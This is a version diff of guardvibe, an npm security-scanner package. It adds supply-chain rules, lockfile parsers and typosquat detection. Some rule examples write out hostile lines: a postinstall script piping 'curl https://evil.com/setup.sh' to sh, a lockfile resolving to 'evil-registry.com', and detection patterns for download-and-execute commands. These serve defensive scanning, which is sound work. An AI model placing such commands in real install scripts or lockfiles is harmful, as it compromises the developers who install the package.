guardvibe 2.3.7 → 2.3.9

package/README.md

@@ -5,7 +5,7 @@
 [![Node.js CI](https://github.com/goklab/guardvibe/actions/workflows/ci.yml/badge.svg)](https://github.com/goklab/guardvibe/actions/workflows/ci.yml)
 [![npm provenance](https://img.shields.io/badge/provenance-verified-brightgreen)](https://www.npmjs.com/package/guardvibe)
 
-**The security MCP built for vibe coding.** 307 security rules covering the entire AI-generated code journey — from first line to production deployment.
+**The security MCP built for vibe coding.** 313 security rules covering the entire AI-generated code journey — from first line to production deployment.
 
 Works with **Claude Code, Cursor, Gemini CLI, Codex, VS Code (Copilot), Windsurf**, and any MCP-compatible coding agent.
 
@@ -13,7 +13,7 @@ Works with **Claude Code, Cursor, Gemini CLI, Codex, VS Code (Copilot), Windsurf
 
 Most security tools are built for enterprise security teams. GuardVibe is built for **you** — the developer using AI to build and ship web apps fast.
 
-- **307 security rules** purpose-built for the stacks AI agents generate
+- **313 security rules** purpose-built for the stacks AI agents generate
 - **Zero setup friction** — `npx guardvibe` and you're scanning
 - **No account required** — runs 100% locally, no API keys, no cloud
 - **Understands your stack** — not generic SAST, but rules that know Next.js, Supabase, Stripe, Clerk, and the tools you actually use
@@ -39,7 +39,7 @@ GuardVibe is purpose-built for the AI coding workflow. Traditional tools are exc
 | CVE version detection | 21 packages | Extensive | Extensive |
 | Compliance mapping (SOC2, PCI-DSS, HIPAA) | Built-in | Paid tier | None |
 | SARIF CI/CD export | Yes | Yes | Limited |
-| Rule count | 307 (focused) | 5000+ (broad) | N/A |
+| Rule count | 313 (focused) | 5000+ (broad) | N/A |
 
 **When to use GuardVibe:** You're building with AI agents and want security scanning integrated into your coding workflow — no dashboard, no account, no CI setup.
 
@@ -210,7 +210,7 @@ Malicious postinstall scripts, unpinned GitHub Actions, typosquat detection
 
 All scanning tools support `format: "json"` for machine-readable output.
 
-## Security Rules (307 rules across 23 modules)
+## Security Rules (313 rules across 23 modules)
 
 | Category | Rules | Coverage |
 |----------|-------|----------|
@@ -230,7 +230,7 @@ All scanning tools support `format: "json"` for machine-readable output.
 | CVE Version Intelligence | 21 | Known vulnerable versions in package.json (21 CVEs) |
 | Shell / Bash | 5 | Pipe to bash, chmod 777, rm -rf, sudo password |
 | SQL | 4 | DROP/DELETE without WHERE, stacked queries, GRANT ALL |
-| Supply Chain | 10 | Malicious install scripts, unpinned actions, typosquat detection |
+| Supply Chain | 16 | Malicious install scripts, lockfile integrity, dependency confusion, typosquat detection |
 | Go | 6 | SQL injection, command injection, template escaping |
 | Dockerfile | 7 | Root user, secrets in ENV, untagged images, non-root user |
 | CI/CD (GitHub Actions) | 7 | Secrets interpolation, unpinned actions, write-all permissions |

package/build/data/rules/supply-chain.js

@@ -120,4 +120,76 @@ export const supplyChainRules = [
         fixCode: '// DANGEROUS — self-deleting payload:\n// "postinstall": "node setup.js && rm -f setup.js"\n\n// Legitimate scripts don\'t delete themselves:\n"scripts": {\n  "postinstall": "patch-package"\n}',
         compliance: ["SOC2:CC7.1"],
     },
+    {
+        id: "VG870",
+        name: "Lockfile Missing Integrity Hash",
+        severity: "critical",
+        owasp: "A03:2025 Software Supply Chain Failures",
+        description: "A package in the lockfile (package-lock.json) is missing an integrity hash. Integrity hashes (sha512/sha256) ensure that the downloaded package matches what was originally resolved. Missing hashes indicate possible lockfile tampering — the exact technique used in the Axios supply chain attack (March 2026) where a malicious dependency was injected without proper integrity verification.",
+        pattern: /"node_modules\/[^"]+"\s*:\s*\{[^}]*"resolved"\s*:\s*"[^"]*"(?![^}]*"integrity")[^}]*\}/g,
+        languages: ["json"],
+        fix: "Run `npm install` with a clean node_modules to regenerate integrity hashes. If hashes were manually removed, investigate for lockfile tampering.",
+        fixCode: '// Healthy lockfile entry has integrity hash:\n"node_modules/axios": {\n  "version": "1.7.9",\n  "resolved": "https://registry.npmjs.org/axios/-/axios-1.7.9.tgz",\n  "integrity": "sha512-LhHLbBcJkvZz..."\n}\n\n// DANGEROUS — missing integrity:\n// "node_modules/axios": {\n//   "version": "1.14.1",\n//   "resolved": "https://registry.npmjs.org/axios/-/axios-1.14.1.tgz"\n// }',
+        compliance: ["SOC2:CC7.1", "PCI-DSS:Req6.5.10"],
+    },
+    {
+        id: "VG871",
+        name: "Non-Registry Tarball URL in Lockfile",
+        severity: "critical",
+        owasp: "A03:2025 Software Supply Chain Failures",
+        description: 'Lockfile contains a "resolved" URL pointing to a non-official npm registry. Legitimate packages resolve to registry.npmjs.org. Third-party or attacker-controlled registries can serve tampered packages. This is a key indicator of dependency substitution attacks.',
+        pattern: /"resolved"\s*:\s*"https?:\/\/(?!registry\.npmjs\.org\/)[^"]*\.tgz"/g,
+        languages: ["json"],
+        fix: "Verify the package source. If using a private registry, ensure it is your organization's approved registry. Remove any packages resolving to unknown hosts.",
+        fixCode: '// Safe — official npm registry:\n"resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz"\n\n// DANGEROUS — unknown registry:\n// "resolved": "https://evil-registry.com/lodash/-/lodash-4.17.21.tgz"',
+        compliance: ["SOC2:CC7.1", "PCI-DSS:Req6.5.10"],
+    },
+    {
+        id: "VG872",
+        name: "Dependency Confusion Risk — Unscoped Internal Package Name",
+        severity: "high",
+        owasp: "A03:2025 Software Supply Chain Failures",
+        description: 'Package dependency uses common internal naming patterns (e.g., prefixed with "internal-", "company-", "app-") without an npm scope (@org/). Unscoped packages with internal-sounding names are prime targets for dependency confusion attacks — an attacker publishes a higher-versioned package with the same name on the public registry.',
+        pattern: /"(?:internal-|company-|corp-|private-|infra-|platform-|service-|lib-|shared-|common-|core-|base-|app-|org-|team-|dept-)[a-z0-9-]+":\s*"[\^~]?\d/g,
+        languages: ["json"],
+        fix: "Use npm scopes (@your-org/package-name) for all internal packages. Configure .npmrc to route your scope to your private registry.",
+        fixCode: '// DANGEROUS — unscoped internal package (dependency confusion target):\n"dependencies": {\n  "internal-auth": "^2.1.0"\n}\n\n// Safe — scoped to your org:\n"dependencies": {\n  "@mycompany/internal-auth": "^2.1.0"\n}',
+        compliance: ["SOC2:CC7.1"],
+    },
+    {
+        id: "VG873",
+        name: "Suspicious Package Name — Deceptive Prefix/Suffix Pattern",
+        severity: "high",
+        owasp: "A03:2025 Software Supply Chain Failures",
+        description: 'Dependency uses a deceptive naming pattern that mimics a legitimate package with a prefix or suffix (e.g., "plain-crypto-js" mimicking "crypto-js", "real-lodash" mimicking "lodash"). This is the exact technique used in the Axios NPM supply chain attack (March 2026) where the injected "plain-crypto-js" package was a backdoor disguised as a crypto utility.',
+        pattern: /"(?:plain-|real-|original-|safe-|secure-|true-|actual-|verified-|legit-|official-|clean-|pure-|native-|simple-|fast-|super-|ultra-|better-|enhanced-|improved-|modern-|updated-)[a-z][\w.-]*":\s*"[\^~]?\d/g,
+        languages: ["json"],
+        fix: "Verify the package is legitimate. Check npm for the package author, publication date, and download count. Compare with the well-known package it appears to mimic.",
+        fixCode: '// DANGEROUS — deceptive prefix mimicking crypto-js:\n"dependencies": {\n  "plain-crypto-js": "^1.0.0"\n}\n\n// Safe — use the real package:\n"dependencies": {\n  "crypto-js": "^4.2.0"\n}',
+        compliance: ["SOC2:CC7.1"],
+    },
+    {
+        id: "VG874",
+        name: "Install Script Downloads and Executes Remote Code",
+        severity: "critical",
+        owasp: "A03:2025 Software Supply Chain Failures",
+        description: "Install script combines download and execution in a single command (e.g., curl|sh, wget|bash, fetch+eval). This is the most dangerous pattern in supply chain attacks — it downloads arbitrary code and immediately executes it with the developer's full permissions.",
+        pattern: /["'](?:post|pre)install["']\s*:\s*["'][^"']*(?:curl[^"']*\|\s*(?:sh|bash|node)|wget[^"']*\|\s*(?:sh|bash|node)|fetch\([^)]*\)[^"']*\.then[^"']*eval|npx\s+[^@\s][^"']*)/gi,
+        languages: ["json"],
+        fix: "Never pipe remote content directly to a shell. Download files first, verify checksums, then execute.",
+        fixCode: '// DANGEROUS — download and execute:\n// "postinstall": "curl https://evil.com/setup.sh | sh"\n\n// Safe — no remote execution in install scripts:\n"scripts": {\n  "postinstall": "prisma generate"\n}',
+        compliance: ["SOC2:CC7.1", "PCI-DSS:Req6.5.10"],
+    },
+    {
+        id: "VG875",
+        name: "Lockfile Contains Deprecated SHA-1 Integrity",
+        severity: "medium",
+        owasp: "A03:2025 Software Supply Chain Failures",
+        description: "Lockfile uses SHA-1 integrity hashes instead of SHA-512. SHA-1 is cryptographically broken — collision attacks are practical. An attacker who can produce a SHA-1 collision could substitute a malicious package that passes integrity verification. Modern lockfiles should exclusively use SHA-512.",
+        pattern: /"integrity"\s*:\s*"sha1-[A-Za-z0-9+/=]+"/g,
+        languages: ["json"],
+        fix: "Delete node_modules and package-lock.json, then run `npm install` to regenerate with SHA-512 hashes. Ensure you are using npm >= 7.",
+        fixCode: '// WEAK — SHA-1 integrity (broken algorithm):\n"integrity": "sha1-abc123def456..."\n\n// Strong — SHA-512 integrity:\n"integrity": "sha512-abc123def456ghij..."',
+        compliance: ["SOC2:CC7.1", "PCI-DSS:Req6.5.10"],
+    },
 ];

package/build/utils/manifest-parser.js

@@ -4,6 +4,10 @@ export function parseManifest(content, filename) {
         return parsePackageLock(content);
     if (lower === "package.json")
         return parsePackageJson(content);
+    if (lower === "yarn.lock")
+        return parseYarnLock(content);
+    if (lower === "pnpm-lock.yaml")
+        return parsePnpmLock(content);
     if (lower === "requirements.txt")
         return parseRequirementsTxt(content);
     if (lower === "go.mod")
@@ -77,6 +81,97 @@ function walkPackageLockDependencies(dependencies, packages) {
         }
     }
 }
+function parseYarnLock(content) {
+    const packages = new Map();
+    // yarn.lock v1 format:
+    // "package@^version":
+    //   version "1.2.3"
+    //   resolved "https://registry.yarnpkg.com/..."
+    //   integrity sha512-...
+    //
+    // yarn berry (v2+) format:
+    // "package@npm:^version":
+    //   version: 1.2.3
+    //   resolution: "package@npm:1.2.3"
+    const lines = content.split("\n");
+    let currentName = null;
+    for (const rawLine of lines) {
+        const line = rawLine.trimEnd();
+        // Skip comments and empty lines
+        if (!line || line.startsWith("#")) {
+            currentName = null;
+            continue;
+        }
+        // Package header line (not indented)
+        if (!line.startsWith(" ") && !line.startsWith("\t")) {
+            // Extract package name from patterns like:
+            // "axios@^1.7.0, axios@^1.7.9":
+            // axios@^1.7.0:
+            const headerMatch = line.match(/^"?(@?[^@\s,"]+)@/);
+            if (headerMatch) {
+                currentName = headerMatch[1];
+            }
+            else {
+                currentName = null;
+            }
+            continue;
+        }
+        // Version line (indented)
+        if (currentName) {
+            // v1: '  version "1.7.9"'
+            const v1Match = line.match(/^\s+version\s+"([^"]+)"/);
+            if (v1Match) {
+                const version = sanitizeVersion(v1Match[1]);
+                if (version) {
+                    addPackage(packages, { name: currentName, version, ecosystem: "npm" });
+                }
+                currentName = null;
+                continue;
+            }
+            // berry: '  version: 1.7.9'
+            const berryMatch = line.match(/^\s+version:\s+(.+)/);
+            if (berryMatch) {
+                const version = sanitizeVersion(berryMatch[1].trim().replace(/^"|"$/g, ""));
+                if (version) {
+                    addPackage(packages, { name: currentName, version, ecosystem: "npm" });
+                }
+                currentName = null;
+                continue;
+            }
+        }
+    }
+    return [...packages.values()];
+}
+function parsePnpmLock(content) {
+    const packages = new Map();
+    // pnpm-lock.yaml format (v6+):
+    //   /@scope/package@1.2.3:
+    //     resolution: {integrity: sha512-...}
+    //
+    // pnpm-lock.yaml format (v9+):
+    //   '@scope/package@1.2.3':
+    //     resolution: {integrity: sha512-...}
+    //
+    // Also handles packages section:
+    //   /package@1.2.3:
+    const lines = content.split("\n");
+    for (const rawLine of lines) {
+        const line = rawLine.trimEnd();
+        // Match package entries like:
+        // '/@scope/package@1.2.3:'  or  '  /@scope/package@1.2.3:'
+        // '/package@1.2.3:'
+        // '@scope/package@1.2.3':   (v9+ quoted format)
+        const pnpmMatch = line.match(/^\s+['"]?\/?(@?[a-zA-Z0-9][\w./-]*?)@(\d[^:'"\s]*)['"]?\s*:/);
+        if (pnpmMatch) {
+            const name = pnpmMatch[1];
+            const version = sanitizeVersion(pnpmMatch[2]);
+            if (version && name) {
+                addPackage(packages, { name, version, ecosystem: "npm" });
+            }
+        }
+    }
+    return [...packages.values()];
+}
 function parseRequirementsTxt(content) {
     const packages = new Map();
     for (const line of content.split("\n")) {

package/build/utils/typosquat.js

@@ -72,11 +72,82 @@ export function levenshtein(a, b) {
     }
     return dp[m][n];
 }
+// Deceptive prefixes used in supply chain attacks (e.g., "plain-crypto-js" → "crypto-js")
+const DECEPTIVE_PREFIXES = [
+    "plain-", "real-", "original-", "safe-", "secure-", "true-", "actual-",
+    "verified-", "legit-", "official-", "clean-", "pure-", "native-", "simple-",
+    "fast-", "super-", "ultra-", "better-", "enhanced-", "improved-", "modern-",
+    "updated-", "new-", "my-", "the-", "a-", "node-", "js-", "ts-",
+];
+// Deceptive suffixes (e.g., "lodash-utils" → "lodash", "express-js" → "express")
+const DECEPTIVE_SUFFIXES = [
+    "-js", "-ts", "-node", "-utils", "-util", "-lib", "-helper", "-helpers",
+    "-core", "-plus", "-pro", "-next", "-new", "-v2", "-v3", "-latest",
+    "-fixed", "-patched", "-secure", "-safe", "-clean",
+];
+/**
+ * Detects prefix/suffix squatting attacks.
+ * e.g., "plain-crypto-js" strips to "crypto-js" → exact match → high confidence typosquat.
+ */
+function detectPrefixSuffixSquat(name) {
+    const lower = name.toLowerCase();
+    for (const prefix of DECEPTIVE_PREFIXES) {
+        if (lower.startsWith(prefix)) {
+            const stripped = lower.slice(prefix.length);
+            if (POPULAR_PACKAGES.includes(stripped)) {
+                return { similarTo: stripped, confidence: 0.95 };
+            }
+            // Also check Levenshtein against stripped name
+            for (const popular of POPULAR_PACKAGES) {
+                const popularBare = popular.startsWith("@") ? popular.split("/").pop() ?? popular : popular;
+                if (Math.abs(stripped.length - popularBare.length) <= 1 && levenshtein(stripped, popularBare) === 1) {
+                    return { similarTo: popular, confidence: 0.85 };
+                }
+            }
+        }
+    }
+    for (const suffix of DECEPTIVE_SUFFIXES) {
+        if (lower.endsWith(suffix)) {
+            const stripped = lower.slice(0, -suffix.length);
+            if (POPULAR_PACKAGES.includes(stripped)) {
+                return { similarTo: stripped, confidence: 0.9 };
+            }
+        }
+    }
+    return null;
+}
+/**
+ * Detects separator manipulation attacks.
+ * e.g., "crypto_js" → "crypto-js", "crypto.js" → "crypto-js"
+ */
+function detectSeparatorSquat(name) {
+    const lower = name.toLowerCase();
+    // Replace underscores and dots with hyphens, then check
+    const normalized = lower.replace(/[_.]/g, "-");
+    if (normalized !== lower && POPULAR_PACKAGES.includes(normalized)) {
+        return { similarTo: normalized, confidence: 0.9 };
+    }
+    // Reverse: replace hyphens with underscores/dots
+    const withUnderscore = lower.replace(/-/g, "_");
+    if (withUnderscore !== lower && POPULAR_PACKAGES.includes(withUnderscore)) {
+        return { similarTo: withUnderscore, confidence: 0.9 };
+    }
+    return null;
+}
 export function detectTyposquat(name) {
     const lower = name.toLowerCase();
     // Exact match = not a typosquat
     if (POPULAR_PACKAGES.includes(lower))
         return null;
+    // 1. Check prefix/suffix squatting (highest priority — Axios attack pattern)
+    const prefixSuffix = detectPrefixSuffixSquat(lower);
+    if (prefixSuffix)
+        return prefixSuffix;
+    // 2. Check separator manipulation
+    const separator = detectSeparatorSquat(lower);
+    if (separator)
+        return separator;
+    // 3. Classic Levenshtein distance check
     // Strip scope for comparison
     const bareName = lower.startsWith("@") ? lower.split("/").pop() ?? lower : lower;
     let bestMatch = null;

package/package.json

@@ -1,7 +1,7 @@
 {
   "name": "guardvibe",
-  "version": "2.3.7",
-  "description": "Security MCP for vibe coding. 307 rules, 25 tools for Next.js, Supabase, Clerk, Stripe, Prisma, tRPC, Hono, GraphQL, Convex, Turso, Uploadthing, AI SDK, and the full AI-generated stack.",
+  "version": "2.3.9",
+  "description": "Security MCP for vibe coding. 313 rules, 25 tools for Next.js, Supabase, Clerk, Stripe, Prisma, tRPC, Hono, GraphQL, Convex, Turso, Uploadthing, AI SDK, and the full AI-generated stack.",
   "type": "module",
   "bin": {
     "guardvibe": "build/cli.js",